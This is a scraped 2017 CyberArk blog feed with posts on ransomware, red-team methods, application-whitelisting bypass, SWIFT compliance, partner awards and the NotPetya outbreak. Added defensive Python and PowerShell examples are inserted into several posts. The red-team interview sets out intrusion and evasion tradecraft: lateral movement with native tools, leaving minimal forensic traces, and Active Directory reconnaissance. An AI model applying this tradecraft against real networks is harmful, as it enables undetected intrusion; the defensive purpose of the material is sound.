  1. What is ransomware? Ransomware is a type of malicious software, or malware, that denies access to files and data until a ransom is paid. There are two distinct types of ransomware. The most common is crypto ransomware, which encrypts sensitive data and files until a ransom is paid. The other type, locker ransomware, locks a device, completely preventing the victim from using it. In most cases, ransomware encrypts personal files, blocking users from accessing them. Victims are given instructions on how to pay the requested ransom, and only after doing so, are they given a decryption tool that will unlock the files.
  2. How does ransomware encryption work? A well-designed ransomware strain will typically use an asymmetric encryption algorithm, which leverages a pair of keys – one public and one private. The data that is encrypted with the public key can only be unlocked by this matching private key and vice versa.
  3. How do victims pay cyber ransoms? Ransoms are typically paid in the cryptocurrency Bitcoin due to its anonymity and difficulty to trace.
  4. How much is a typical ransom? Requested ransom amounts can vary wildly. In the WannaCry attacks, victims were asked to pay between $300 and $600 in Bitcoin to have their files unlocked. This may not seem like much, but it’s important to consider the other, more severe costs resulting from such attacks due to downtime caused by lack of access to systems. Shockingly, it was recently reported that a South Korean web hosting provider paid $1 million in bitcoins to hackers after a Linux ransomware infected its servers and encrypted the websites’ data hosted on them, a big jump from the amount the Hollywood Presbyterian Medical Center reportedly paid last year.
  5. How do I mitigate risk? Ransomware prevention measures can seem particularly daunting, as administrator rights are not always required for some of today’s advanced strains of malware to compromise an end user’s machine and infect the endpoint. This means that while privilege management can play a role in mitigating risk, many strains of ransomware can encrypt data using standard user rights. So even if an organization has removed local administrator rights, this doesn’t necessarily mitigate the risk. However, testing at CyberArk Labs demonstrated that application control, including greylisting, coupled with the removal of local administrator rights, was 100 percent effective in preventing ransomware from encrypting files.

Watch this CyberArk Brief and learn how to proactively protect against ransomware.

The Art of the Ethical Hack: A Q&A with CyberArk’s Head of Red Team Services https://www.cyberark.com/blog/art-ethical-hack-qa-cyberarks-red-team-lead/ Wed, 26 Jul 2017 14:45:16 +0000 https://www.cyberark.com/?p=15941

Today’s highly motivated cyber attackers continually hone their skills. After all, their job is to know your network better than you do, exploiting even the smallest vulnerability to carry out a mission. In order to stay a step ahead of advanced maneuvers, it’s critical to adopt an attacker’s mindset. For many organizations, a Red Team plays an integral role in continuously improving security practices.

CyberArk Red Team services provide a safe way for security operations teams to test their ability to effectively defend against cyber attacks. The CyberArk Red Team uses a variety of tactics, techniques and procedures (TTPs) that are used in real world attacks to help clients uncover vulnerabilities, test security procedures and identify areas of improvement.

We recently spoke with Shay Nahari, our Head of Red Team Services, to learn more about the process and goals of simulated attacks. Here are some highlights from our discussion. Additional information about the Red Team is available here.

Q: Why do organizations request adversary simulation?

A: Organizations hire us to test their teams’ ability to detect and respond to targeted attacks against their infrastructure. By thinking and acting like real attackers, we give our customers a way to face a real attack and learn from it.

Q: How do you prepare for a simulation?

A: Before any simulation, we focus on reconnaissance, trying to learn as much as we can about the target organization, its employees and the security measures in place. To do so, we employ a number of methods, such as collecting information from public sources like LinkedIn, Shodan and other lesser-known sources. Armed with this information, we typically utilize custom malware to evade their security measures, then either exploit a vulnerability, an external server or use social engineering to gain an initial foothold in the network.

Q: How easy is it to breach a typical network? And what do you do once you get inside?

A: First, there are always ways to get inside a network. That’s why it’s important for organizations to change their mindsets around cyber attacks. It’s not a matter of “if” but a matter of “when.” Organizations have to adopt an “assumed breach” mindset – assume that one (or more) of their resources is already compromised.

Once we’re inside, we always try to exploit built-in trust as a first step. Trust usually translates to some type of credential – passwords, hashes, SSH keys, tickets. We can abuse this trust to impersonate real users and typical user behavior, which makes it very hard for the defenders to detect the intrusion.

Q: What happens after you breach a network? 

A: Once we have a foothold in the network, we take time to familiarize ourselves with our surroundings. At this point, most of the information we need can be gathered by abusing inherent trusts in the target environment, without necessarily requiring admin rights. For example, with standard user privileges, we can query the Active Directory and learn the network topology, map out users and group membership, and also see what privileges users have within the network. We can see their last login time, where they logged in to, and with what privileges.

At this point, we can build a map of the network and create an attack path. During these simulations, we ideally only target internal resources that can either help us escalate privileges or that have the access to the “crown jewel” we’re after – whether it’s financial, intellectual property or something else.

In Windows environments, AD contains a lot of useful information. Even if my “crown jewels” aren’t in the Windows environment, user group and system information can be extremely helpful in mapping out the most direct attack path.

Q: What happens after you establish an attack path?

A: Once we have an attack path, we need to start pivoting in the network. Before we can do this, we need to escalate privileges or abuse some sort of inherent trust on the local target. Once we do that, we can start looking for passwords, hashes, SSH keys, tokens, Kerberos tickets, or anything else that we can leverage for pivoting. Credentials are everywhere. Unless you maintain very strict operational security, one remote login can allow me to take over your entire AD forest.

Next, we try to “live off the land” – which means we try to abuse native tools in order to reuse the credentials we’ve found. With every new system we compromise, we repeat the process, which in turn, allows us to gain access to another set of machines, until we’re able to gain domain admin. Once we achieve domain admin, the main goal is to persist and stay hidden in the network until we can reach the “crown jewels.”

Q: How do you stay hidden?

A: We try to make sure our actions generate the fewest and smallest footprints possible. For example, WMI or PowerShell remoting are much better options during lateral movement because they leave much less forensic evidence than, let’s say, PsExec.

We leverage native tools to avoid defensive tactics. For example, PowerShell gives you access to the entire .NET language, and other built-in tools allow you to compile code natively on Windows without introducing external binaries on the system. By avoiding touching disk and injecting into memory, you can make hunting and IR much harder for the defender.

Q: So how can organizations stop this?

A: It’s important for organizations to have an “assume breach” mindset regarding their security posture. Assume your internal network is as hostile as your external network. One major way organizations can reduce risk is by limiting internal users’ ability to gather information from AD. In most cases, you can limit what types of information regular users are able to gather. If you can limit what attackers can learn, it’s much harder for them (and us!) to build an attack path.

Additionally, use two-factor authentication everywhere you can. Rotate and randomize passwords on a regular basis to make cracking them time-consuming for the attacker.

Avoid giving standard users local admin rights, make local admin accounts unique, and keep privileged accounts to a bare minimum. By doing that, you’re significantly raising the bar and making lateral movement much harder for the attacker.

It’s also important to understand what is normally running on your network – and create a baseline of internal traffic. Without a baseline, you don’t know if what you are seeing is suspicious or not. Lastly, block machine-to-machine communication to the greatest extent possible.

Note: For additional Red Team insights, read CyberArk’s Threat Research blog.
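The baselining advice at the end of the interview can be turned into detection logic. The following added example (not CyberArk’s code and not part of the interview) builds a baseline of which accounts log on from which host to which host, then flags account/source pairs that reach several previously unseen targets in a short window, the fan-out pattern that credential reuse during lateral movement produces. The log lines are constructed, simplified renderings of Windows 4624 network logons (logon type 3); the field layout, host names and accounts are all assumptions.

```python
"""Baseline machine-to-machine logons and flag fan-out to new targets.
Added example; the log format is a constructed, pipe-delimited rendering of
Windows Security event 4624 (logon type 3 = network), not the real format."""

from __future__ import annotations
from collections import defaultdict

# Constructed baseline week: timestamp | event id | logon type | account | source | target
BASELINE_LOG = """\
2017-07-17T08:01:10Z|4624|3|alice|WS-ALICE|FILESRV01
2017-07-17T08:03:42Z|4624|3|bob|WS-BOB|FILESRV01
2017-07-17T09:15:00Z|4624|3|svc_backup|BACKUP01|FILESRV01
2017-07-17T09:15:05Z|4624|3|svc_backup|BACKUP01|DB01
2017-07-18T08:02:11Z|4624|3|alice|WS-ALICE|FILESRV01
2017-07-18T21:00:00Z|4624|3|it_admin|JUMP01|DB01
2017-07-18T21:00:30Z|4624|3|it_admin|JUMP01|FILESRV01
"""

# Constructed observation window: a workstation account reaching four servers
# it never touched during the baseline period, within seconds of each other.
OBSERVED_LOG = """\
2017-07-24T08:00:05Z|4624|3|alice|WS-ALICE|FILESRV01
2017-07-24T10:12:01Z|4624|3|bob|WS-BOB|DB01
2017-07-24T10:12:07Z|4624|3|bob|WS-BOB|FILESRV02
2017-07-24T10:12:13Z|4624|3|bob|WS-BOB|JUMP01
2017-07-24T10:12:20Z|4624|3|bob|WS-BOB|BACKUP01
2017-07-24T21:00:02Z|4624|3|it_admin|JUMP01|DB01
"""

Triple = tuple[str, str, str]  # (account, source host, target host)


def parse_network_logons(text: str) -> list[Triple]:
    """Keep only 4624 events of logon type 3; other event ids and types are ignored."""
    out: list[Triple] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, event_id, logon_type, account, src, dst = line.split("|")
        if event_id == "4624" and logon_type == "3":
            out.append((account, src, dst))
    return out


def build_baseline(text: str) -> set[Triple]:
    """The set of (account, source, target) combinations seen during normal operation."""
    return set(parse_network_logons(text))


def find_deviations(baseline: set[Triple], text: str) -> list[Triple]:
    """Combinations in the observed log that the baseline never contained, de-duplicated."""
    seen: set[Triple] = set()
    deviations: list[Triple] = []
    for triple in parse_network_logons(text):
        if triple not in baseline and triple not in seen:
            seen.add(triple)
            deviations.append(triple)
    return deviations


def fan_out_alerts(deviations: list[Triple], threshold: int = 3) -> dict[str, list[str]]:
    """Group new targets by (account, source); reaching >= threshold new hosts
    is the lateral-movement signal worth an analyst's attention."""
    targets: dict[tuple[str, str], list[str]] = defaultdict(list)
    for account, src, dst in deviations:
        targets[(account, src)].append(dst)
    return {f"{account}@{src}": sorted(hosts)
            for (account, src), hosts in targets.items() if len(hosts) >= threshold}


if __name__ == "__main__":
    devs = find_deviations(build_baseline(BASELINE_LOG), OBSERVED_LOG)
    for alert, hosts in fan_out_alerts(devs).items():
        print(f"ALERT {alert} reached {len(hosts)} new hosts: {', '.join(hosts)}")
```

The reason a source/target baseline is useful against the tooling described above: whether the operator chooses PsExec, WMI or PowerShell remoting, the target host still records a network logon (event 4624, type 3) for the authenticating account, so the pairing of accounts, sources and targets is largely independent of which tool left the smaller on-disk footprint. In production the baseline would be rebuilt periodically and the threshold tuned per account class (service accounts legitimately fan out; workstation users rarely do).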

Circumventing Application Whitelisting and Misplaced Trust https://www.cyberark.com/blog/circumventing-application-whitelisting-misplaced-trust/ Mon, 24 Jul 2017 16:49:12 +0000 https://www.cyberark.com/?p=15880

Application whitelisting has been an advantageous technique to harden an organization’s endpoints against malware, unlicensed software, and other unknown or unauthorized software. When properly configured, whitelisting certainly has its benefits as it controls which applications and scripts can run and execute. However, traditional whitelisting technologies will limit the user to a binary ‘allow/deny’ mode. This approach may work just fine for smaller organizations that have only a handful of applications, but in large enterprises, this can be extremely challenging to support. The organization would need to either ‘allow the unknown’ and open themselves up to unnecessary risk – or – ‘deny the unknown’ and deal with disgruntled users and operational issues.

Attackers increasingly have sophisticated techniques. If an organization has something of significant value to attackers, then you can certainly expect that they’ll find ways to circumvent application whitelisting policies. Heuristic-based detection and scanning methods can help supplement a risk mitigation strategy against attacks initiated by these bypassing techniques – but – is that really enough to keep up with the very skilled and sophisticated cyber attackers that we see today? A defense in depth strategy at the endpoint with multiple layers of security controls is needed.

Misplaced Trust

When an organization relies only on the free and rudimentary tools that let IT administrators define which applications can and cannot be executed, it inadvertently becomes more susceptible to attacks that originate on the endpoint. Furthermore, trusting every binary that is signed by the operating system vendor comes with a certain level of risk. Over the years, researchers have come across many executable files that are able to bypass some of these basic tools with relatively simple commands and run arbitrary scripts, some of which were even able to fetch files and communicate over the internet – not good! These free tools can be a great foundational resource, but additional security controls are needed to improve an organization’s security posture.

Reality Meets Application Control

Expecting your IT administrator to be aware of every application that exists within a larger organization is unrealistic and nearly impossible in practice. Moreover, analyzing these applications and identifying which should be allowed to execute and which should be denied is equally challenging. When an organization enables an application control solution, it often takes a whitelisting approach and therefore must specify exactly what is to be trusted. The most common tactic is to trust every binary that is signed by the operating system vendor – but – not every process that originates from a trusted process (e.g. its child processes) should be considered fully trustworthy. This is particularly important when you consider the techniques of modern malware that leverage tools like PowerShell to pull code (e.g. Mimikatz) from online source code repositories and execute it in memory – thereby bypassing many anti-virus, malware detection or whitelisting solutions. Being limited to only ‘allowing’ or ‘denying’ PowerShell as a whole is certainly not the ideal situation.

A more proactive approach is application “greylisting”, which allows lesser-known applications to run in a restricted mode defined by policy: they are allowed to run but are, for example, denied access to the internet, unable to spawn processes and forced to run at a lower privilege. Operating in a restricted mode gives the end user flexibility while preventing such applications from accessing corporate and system resources as part of a targeted attack.
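To make the whitelist / greylist distinction concrete, here is an added illustration in PowerShell; it is not Endpoint Privilege Manager's code or policy format, and the publisher names, paths, hashes, script-host list and launch events in it are constructed. It shows the decisions the paragraphs above describe: trusted publishers and trusted source paths are allowed, unknown applications run greylisted with restrictions, a signed script host does not lend its trust to an unknown script, and a restricted process may not spawn children.

```powershell
# Added illustration, not Endpoint Privilege Manager's code or policy format.
# Models the whitelist / greylist model described above. All names, paths,
# hashes and launch events are constructed for the example.

$TrustedPublishers    = @('Microsoft Windows', 'Contoso Corp')     # constructed
$TrustedSourcePaths   = @('C:\Windows\ccmcache\*')                 # assumed SCCM cache location
$KnownScripts         = @{ 'C:\Scripts\inventory.vbs' = 'HASH-INVENTORY-001' }  # constructed
$ScriptHosts          = @('bginfo.exe', 'wscript.exe', 'cscript.exe', 'powershell.exe', 'mshta.exe')
$GreylistRestrictions = @('NoInternet', 'NoChildProcesses', 'LowPrivilege')

function New-Verdict {
    param([string]$Verdict, [string[]]$Restrictions, [string]$Reason)
    @{ Verdict = $Verdict; Restrictions = $Restrictions; Reason = $Reason }
}

function Get-AppControlVerdict {
    param(
        [Parameter(Mandatory)] [hashtable]$Event, # Path, Publisher, SignatureValid, Script, ScriptSha256
        $Parent = $null                           # verdict hashtable of the parent process, if any
    )
    $name = [System.IO.Path]::GetFileName($Event.Path).ToLower()

    # 1. A process running in restricted mode may not spawn anything.
    if ($Parent -and ($Parent.Verdict -eq 'Restricted') -and
        ($Parent.Restrictions -contains 'NoChildProcesses')) {
        return (New-Verdict 'Deny' @() 'Parent runs in restricted mode')
    }
    # 2. Script hosts: the script being executed is what must be trusted,
    #    not the signed executable that hosts it.
    if (($ScriptHosts -contains $name) -and $Event.Script) {
        $known = $KnownScripts[$Event.Script]
        if ($known -and ($known -eq $Event.ScriptSha256)) {
            return (New-Verdict 'Allow' @() "Known script hosted by $name")
        }
        return (New-Verdict 'Deny' @() "Unknown script hosted by $name")
    }
    # 3. Files delivered by the corporate software distribution system.
    foreach ($pattern in $TrustedSourcePaths) {
        if ($Event.Path -like $pattern) {
            return (New-Verdict 'Allow' @() 'Trusted source path')
        }
    }
    # 4. Trusted publisher, but only when the signature actually verified.
    if ($Event.SignatureValid -and ($TrustedPublishers -contains $Event.Publisher)) {
        return (New-Verdict 'Allow' @() "Trusted publisher: $($Event.Publisher)")
    }
    # 5. Everything else runs, but greylisted into restricted mode.
    return (New-Verdict 'Restricted' $GreylistRestrictions 'Unknown application')
}

# Constructed launch events (a real agent would take these from the kernel).
$notepad = @{ Path = 'C:\Windows\System32\notepad.exe'; Publisher = 'Microsoft Windows'; SignatureValid = $true }
$bginfo  = @{ Path = 'C:\Tools\Bginfo.exe'; Publisher = 'Microsoft Windows'; SignatureValid = $true;
              Script = 'C:\Users\alice\Downloads\update.vbs'; ScriptSha256 = 'HASH-UNKNOWN-999' }
$setup   = @{ Path = 'C:\Users\alice\Downloads\setup.exe'; Publisher = 'Unknown Vendor'; SignatureValid = $false }
$cmd     = @{ Path = 'C:\Windows\System32\cmd.exe'; Publisher = 'Microsoft Windows'; SignatureValid = $true }
$agent   = @{ Path = 'C:\Windows\ccmcache\a1\agent.exe'; Publisher = 'Unknown Vendor'; SignatureValid = $false }

$setupVerdict = Get-AppControlVerdict -Event $setup
$cases = @(
    @{ Label = 'notepad.exe (OS-signed)';            Event = $notepad; Parent = $null },
    @{ Label = 'Bginfo.exe hosting unknown .vbs';    Event = $bginfo;  Parent = $null },
    @{ Label = 'setup.exe from Downloads (unknown)'; Event = $setup;   Parent = $null },
    @{ Label = 'cmd.exe spawned by setup.exe';       Event = $cmd;     Parent = $setupVerdict },
    @{ Label = 'agent.exe from SCCM cache';          Event = $agent;   Parent = $null }
)
foreach ($case in $cases) {
    $v = Get-AppControlVerdict -Event $case.Event -Parent $case.Parent
    '{0,-38} {1,-10} {2} {3}' -f $case.Label, $v.Verdict, $v.Reason, ($v.Restrictions -join ',')
}
```

Note that cmd.exe is denied even though it is an OS-signed binary: the verdict is driven by the restricted parent, which is the point of not inheriting trust.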

CyberArk Provides Defense in Depth for Application Control

CyberArk Endpoint Privilege Manager delivers several layers of security beyond what some of the basic, UAC software restricting tools can provide and in so doing is aligned with guidance from NIST Special Publication 800-167, Guide to Application Whitelisting. With CyberArk Endpoint Privilege Manager, users can define whitelists and greylists with flexible rules based upon any combination of various file parameters and not just those based on the file hash, path or publisher (which can easily be sidestepped by a few simple actions). With Endpoint Privilege Manager, an IT organization can provide the level of granularity that allows for specific users on specific machines to run PowerShell, with a pre-defined level of privilege (e.g. standard user, specific privileges [i.e. custom token], etc.).

Additionally, Endpoint Privilege Manager also supports a full range of trusted sources, providing the ability to manage a very large number of the executables within larger-sized organizations (e.g. any file distributed by a corporate software distribution system like System Center Configuration Manager could be defined as a trusted source just by one simple rule). Lastly, this solution provides deep integrations with third-party file reputation systems to help IT administrators determine legitimate applications versus what’s considered to be potentially harmful. The image below shows Endpoint Privilege Manager blocking an unknown .vbs script from running on the endpoint, by using Bginfo.exe (a known executable file signed by the OS vendor that can bypass whitelisting) as the executable host:

Minimizing the endpoint attack surface is top of mind for all IT Security teams and taking a layered approach in securing your endpoints by coupling both privilege management and application control is an essential step in stopping common endpoint attack vectors that organizations often fall victim to. Our CyberArk Labs Team has demonstrated that a combination of privilege management and application control is 100% effective in protecting against both ransomware and unknown malware.

To learn more about how CyberArk solutions can block and contain threats at the endpoint, download the Endpoint Privilege Manager Solution Brief or request a demo.

Address SWIFT Customer Security Controls Framework with CyberArk https://www.cyberark.com/blog/address-swift-customer-security-controls-framework-cyberark/ Mon, 17 Jul 2017 15:13:29 +0000 https://www.cyberark.com/?p=15688

The Society of Worldwide Interbank Financial Telecommunication (SWIFT) provides a community of global financial institutions the ability to exchange sensitive information relating to international financial transactions. This vast network—over 11,000 customers across 200+ countries—has become an attractive, high-value target for cyber attackers, as evidenced by high-profile breaches including the infamous Bangladesh Central Bank heist. By capturing legitimate SWIFT operator credentials while employing increasingly sophisticated hacking techniques, attackers continue to pilfer hundreds of millions from banks around the world.

Protecting these credentials from reaching the hands of criminals is an essential step in preventing future attacks. To that end, SWIFT’s Customer Security Programme has established a secure framework and baseline of accountability for customers of SWIFT. This framework has a strong emphasis on privileged account security. Mandatory and advisory security controls must be implemented across the community, and organizations must prove compliance with these regulations by January 18, 2018.

The SWIFT security framework is comprised of 27 controls based on three overarching objectives, and there are about five months remaining to prove compliance. Fortunately, CyberArk customers can address a majority of these controls. CyberArk provides the capabilities needed to meet requirements around securing the organization’s environment, knowing “who” and “what” has access to critical systems and applications as well as detecting and responding to high-risk activity in operator sessions. Following is a high-level look at how CyberArk can help organizations to meet these core objectives:

Secure Your Environment: Risk comes from outside and within—determined, malicious “outsiders” and careless or disgruntled “insiders.” Either can wreak havoc on a financial institution. Unmanaged privileged credentials and accounts are the common vulnerability in both cases. The CyberArk Privileged Account Security Solution can protect and control access to critical systems and infrastructure within a local SWIFT environment. By removing local administrative rights and using CyberArk Endpoint Privilege Manager, organizations can provide users with non-administrative access and on-demand session elevation when needed based on defined policies. Multiple layers of built-in security serve to protect all privileged account operator credentials, including passwords and SSH keys (which may be used to access critical UNIX/Linux operating systems).

Know and Limit Access: The CyberArk Privileged Session Manager enables organizations to isolate, monitor, record and control privileged sessions on critical systems. The solution acts as a jump server and single access control point enabling organizations to have a “secure zone” to protect the local SWIFT infrastructure. Real-time privilege session monitoring enables security teams to detect suspicious activity as soon as it occurs and remotely terminate the session to minimize any potential damage. Additionally, searchable audit logs and session recordings are stored in a tamper-proof vault to prevent privileged users from editing or deleting their history. Security and audit teams can easily review these recordings and audit logs to locate the exact moment an event occurred and gain a clear understanding of the scope and severity of an incident.

Detect and Respond: Attackers target and compromise legitimate, trusted credentials within the network. This makes detecting their abuse a serious challenge when attempting to detect credential theft attacks. Many institutions also struggle to pinpoint attempts to bypass enforced controls by internal or external threat actors. To help overcome these challenges, CyberArk Privileged Threat Analytics implements detection capabilities around the abuse, misuse and theft attacks on privileged credentials. When combined with the CyberArk Privileged Account Security Solution, CyberArk can flag high-risk, anomalous activity within local SWIFT environments with a fully detailed and searchable audit trail of privileged activity.

To learn more about how CyberArk can help your organization to prepare for the January 2018 SWIFT security framework compliance deadline, check out the webinar replay ‘Fast Track to SWIFT Compliance’.


CyberArk Celebrates 2017 Americas Partner Excellence Award Winners https://www.cyberark.com/blog/cyberark-celebrates-2017-americas-partner-excellence-award-winners/ Tue, 11 Jul 2017 13:34:12 +0000 https://www.cyberark.com/?p=15469

Last night we announced winners of the CyberArk 2017 Americas Partner Excellence Awards. Partners were recognized in a ceremony at the 11th annual CyberArk Impact Americas Summit 2017, the world’s largest event for privileged account security advocates.

These awards celebrate top CyberArk channel, systems integrator and solution provider partners in the United States, Canada and Latin America. These partners have demonstrated strengths across a variety of categories including excellence in cyber security innovation, commitment to training and skills development, and driving customer success with market-leading privileged account security solutions to protect against advanced threats.

Forward-looking organizations that want to proactively protect against damaging cyber attacks continue to turn to CyberArk and its partners to implement the most reliable, comprehensive cyber security solutions available on the market today. The CyberArk Americas Partner Excellence Awards celebrate established and emerging partners that are setting the bar for cyber security innovation and customer success.

The CyberArk 2017 Americas Partner Excellence Award categories and winners are:

United States

  • Partner of the Year 2017 Americas: Optiv
  • Growth Partner 2017 Americas: Sirius Computer Solutions
  • New Business Leader 2017 Americas: Carahsoft
  • Global Systems Integrator 2017 Americas: PwC
  • Innovative Solution Partner 2017 Americas: SecureITSource
  • DevOps Partner 2017 Americas: ShadowSoft
  • Best Newcomer 2017 Americas: Mantech

Canada

  • Best New Partner of the Year 2017 Canada: Herjavec Group
  • Best Technology Partner of the Year 2017 Canada: IAM Concepts

Latin America

  • Partner of the Year 2017 MCLA (Multi-Country Latin America): Digiware
  • Best Newcomer 2017 MCLA (Multi-Country Latin America): Cortelco Systems
  • Partner of the Year Brazil/Argentina: EZ Security
  • Best Newcomer 2017 Brazil/Argentina: Agility Networks
  • Partner of the Year 2017 Mexico: ARAME
  • Best Newcomer 2017 Mexico: Arteria Comunicaciones

CyberArk Impact 2017 features record-breaking attendance with more than 1,000 customers and partners that are driving privileged account security as a business imperative. The event offers an unparalleled opportunity for education, networking and peer-to-peer knowledge exchange among forward-thinking security practitioners.

For more information, read about the CyberArk Global Partner Program.

The NotPetya Global Pandemic – CyberArk Labs Analysis https://www.cyberark.com/blog/notpetya-global-pandemic-cyberark-labs-analysis/ Wed, 28 Jun 2017 19:05:16 +0000 https://www.cyberark.com/blog//

In May 2017, WannaCry took advantage of an exploit in the Windows operating system to usher in a cyber security pandemic – ransomware that can spread its infection like a traditional worm. The results were catastrophic, with some damage estimates reaching up to more than $4 billion.

Yesterday, a new malware dubbed NotPetya emerged as the driving force behind another devastating global incident – one that will likely surpass WannaCry in terms of damage caused. While there are still unknowns in terms of who unleashed the malware and the root motivations, CyberArk Labs has downloaded multiple samples of the malware for analysis.

Here’s what we know thus far about the malware and its progress from infection to global ransomware pandemic.

Infection Point – Ukraine

On June 27th, a massive ransomware attack was initiated in coordinated fashion in a large number of Ukraine Government offices and large enterprises.

This first wave was initiated by attackers that were already on the targeted networks. These attackers were on the network for some time and used this reconnaissance time to plan and coordinate the attack for maximum effectiveness.

The attackers allegedly found a vulnerability in software that is widely used in Ukrainian government facilities. Based on initial analysis by CyberArk Labs, in this initial wave, NotPetya appeared to be sparing endpoints that use a US English-only keyboard. This seemingly self-imposed restriction has been seen in nation state attacks.

Supply Chain Vulnerability: This highlights that attackers continue to infiltrate organizations by targeting third-party partners connected to target networks.

The initial attack was incredibly well-timed and organized – the majority of the targeted systems crashed within the first hour of attack launch.

Once NotPetya gained this foothold inside organizations, it spread using the same incredibly effective method as WannaCry – using the “eternalblue” SMB vulnerability in Microsoft systems. CyberArk Labs also confirmed that NotPetya has a built-in Mimikatz module, designed to steal credentials and facilitate lateral movement across an organization, infecting additional machines.

The credential theft element is important – because this means that even organizations that patched the “eternalblue” SMB vulnerability in Microsoft systems are still vulnerable.

Forming the Global Pandemic

While the initial attack targeted Ukrainian government offices and businesses, subsequent waves of the attack appeared to hit Russia and took off globally.

After the initial infection, the malware spread through traditional means – phishing emails. Random targets across the globe were sent targeted phishing emails that executed the ransomware after recipients clicked on the attached files or links.

Because the ransomware was introduced into networks via phishing – as noted above, even organizations that patched the eternalblue vulnerability were exposed. This ransomware was not stoppable at the perimeter.

Once a recipient clicked on the malicious email, a binary file was dropped onto the targeted machine that checked the endpoint for local administrative rights.

If there were no admin rights on the device to exploit, the ransomware simply died at that point.

If the ransomware was able to steal admin rights, it modified the Master Boot Record (MBR) and installed a new boot partition. The Mimikatz module then kicked in to steal additional credentials to facilitate lateral movement.

This is a critical aspect of the ransomware spread, as NotPetya sought additional machines to infect inside organizations. If the organization failed to patch the eternalblue vulnerability, the ransomware propagated via that vector.

This was the best and fastest way for NotPetya to spread, because it enables the ransomware to be executed in system privileges in the next machine, without the need for credential theft.

While still considered a best practice, patching is NOT enough to stop NotPetya. If a system was patched, the ransomware used the credentials stolen by the Mimikatz module to find other machines and log on to them with those credentials using its built-in PsExec.

Countdown to Chaos

Once the ransomware spread to machines across an organization, it was designed to wait a random amount of time (10 – 60 minutes) before rebooting the machine.

This triggered the slim boot loader, encrypting the Master Boot Loader instead of documents and applications. This is why the malware was so damaging – it prevented users from rebooting their machines.

The result was organizational chaos – disrupting major businesses in Ukraine, India, US, Russia and more.

Protecting Your Organization

As with previous ransomware outbreaks, a combination of least privilege and application control policies on endpoints and servers can mitigate the risk of malware like NotPetya spreading from its initial infection point.

When tested in the CyberArk Lab, the combination of least privilege and application greylisting controls proved 100 percent effective in preventing NotPetya from executing.

CyberArk strongly urges every organization to take these immediate steps:

  • Backup Important Data – Immediately: This should be table-stakes best practice, but every organization should start by making sure all critical data is backed up.
  • Follow the Least Privilege Principle: Always configure access controls including file, directory and network sharing permissions with the least privilege principle in mind. Most users do not need admin privileges to do their required jobs on their corporate endpoint devices, so user access should remain at the minimal level that will allow normal functioning.
    • Note: This does NOT make you immune to NotPetya and ransomware – but it effectively stops the ransomware from spreading and carrying out malicious tasks. Endpoints can be replaced – an organizational shutdown can stop business.
  • Apply Application Control: Controlling which executables have access to your files can also contribute to defensive efforts. For example, if you put the PowerPoint executable in a whitelist as the only executable that has write access to your presentation files, then if a ransomware’s executable tries to encrypt and overwrite the files, it will be denied (as it is not on the “approved” whitelist). It’s important to also establish policies based on trusts that will protect these “trusted” or whitelisted applications.
  • Disable SMB v1 and Apply Patches: Organizations that failed to patch earlier were open targets to NotPetya. Not patching is inexcusable at this point. Organizations should immediately disable the outdated Microsoft SMB protocol version 1 or simply apply the patch MS17-010 that Microsoft released a few months ago.
  • Block Internet Access: The Microsoft SMB protocol is meant to be internal, so your network should not be open to SMB packets from the internet. Implementing port filtering to block all versions of SMB at the network boundary is also an important preventative measure.
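As an added, defender-side illustration of the least privilege, SMB v1 and patching steps above (this is not CyberArk's code and not part of the original post), the following PowerShell script reports a host's SMB1 state, checks whether the MS17-010 hotfix identifiers the operator supplies are installed, lists the local Administrators group, and disables SMB1 when run with -Remediate. It assumes PowerShell 5.1 on Windows 10 with the SmbShare and LocalAccounts modules, started as an administrator; the KB list is a placeholder because the KB that carries MS17-010 differs per OS build.

```powershell
<#
  Added example, not CyberArk's code: audit a Windows 10 host against the
  NotPetya mitigations above (least privilege, disable SMB v1, MS17-010).
  Assumptions: PowerShell 5.1 with the SmbShare and LocalAccounts modules,
  started as an administrator. The KB that carries MS17-010 differs per OS
  build, so $Ms17010Kbs is a placeholder the operator must replace.
#>
[CmdletBinding()]
param(
    [string[]]$Ms17010Kbs = @('KB<placeholder>'),  # replace with this build's MS17-010 KB id(s)
    [switch]$Remediate                             # report only unless set
)

function Test-Smb1State {
    # Server side: the SMB1 switch on the file server service.
    $server = Get-SmbServerConfiguration
    # Component side: the SMB1 optional feature (absent on some builds).
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    $state = 'NotPresent'
    if ($feature) { $state = $feature.State.ToString() }
    [pscustomobject]@{
        ServerSmb1Enabled = [bool]$server.EnableSMB1Protocol
        FeatureState      = $state
    }
}

function Test-Ms17010Installed {
    param([string[]]$Kbs)
    $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    foreach ($kb in $Kbs) {
        [pscustomobject]@{ KB = $kb; Installed = ($installed -contains $kb) }
    }
}

function Get-LocalAdminMembers {
    # NotPetya only proceeded when it found local admin rights; every member
    # listed here should have a documented reason to be in the group.
    Get-LocalGroupMember -Group 'Administrators' |
        Select-Object Name, ObjectClass, PrincipalSource
}

function Disable-Smb1 {
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart -ErrorAction SilentlyContinue | Out-Null
}

$smb = Test-Smb1State
Write-Output "SMB1 server protocol enabled : $($smb.ServerSmb1Enabled)"
Write-Output "SMB1 optional feature state  : $($smb.FeatureState)"
Write-Output 'MS17-010 hotfix check:'
Test-Ms17010Installed -Kbs $Ms17010Kbs | Format-Table -AutoSize | Out-String
Write-Output 'Members of the local Administrators group:'
Get-LocalAdminMembers | Format-Table -AutoSize | Out-String

$smb1Present = $smb.ServerSmb1Enabled -or ($smb.FeatureState -eq 'Enabled')
if ($Remediate -and $smb1Present) {
    Disable-Smb1
    Write-Output 'SMB1 disabled; reboot to complete removal of the optional feature.'
} elseif ($smb1Present) {
    Write-Warning 'SMB1 is still enabled; re-run with -Remediate to disable it.'
}
```

Blocking SMB at the network boundary, the last step in the list, is a perimeter firewall change and is not covered by this host-side script.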

CyberArk Labs continues to seek new variants of this ransomware and will share the results of additional testing and analysis.

5 Ways to Address the General Data Protection Regulation (GDPR) With CyberArk https://www.cyberark.com/blog/5-ways-address-general-data-protection-regulation-gdpr-cyberark/ Mon, 26 Jun 2017 14:43:26 +0000 https://www.cyberark.com/blog//

